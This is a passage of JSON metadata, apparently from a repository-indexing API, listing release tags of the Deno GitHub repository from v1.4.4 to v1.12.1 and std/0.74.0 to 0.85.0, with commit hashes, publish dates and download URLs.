v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4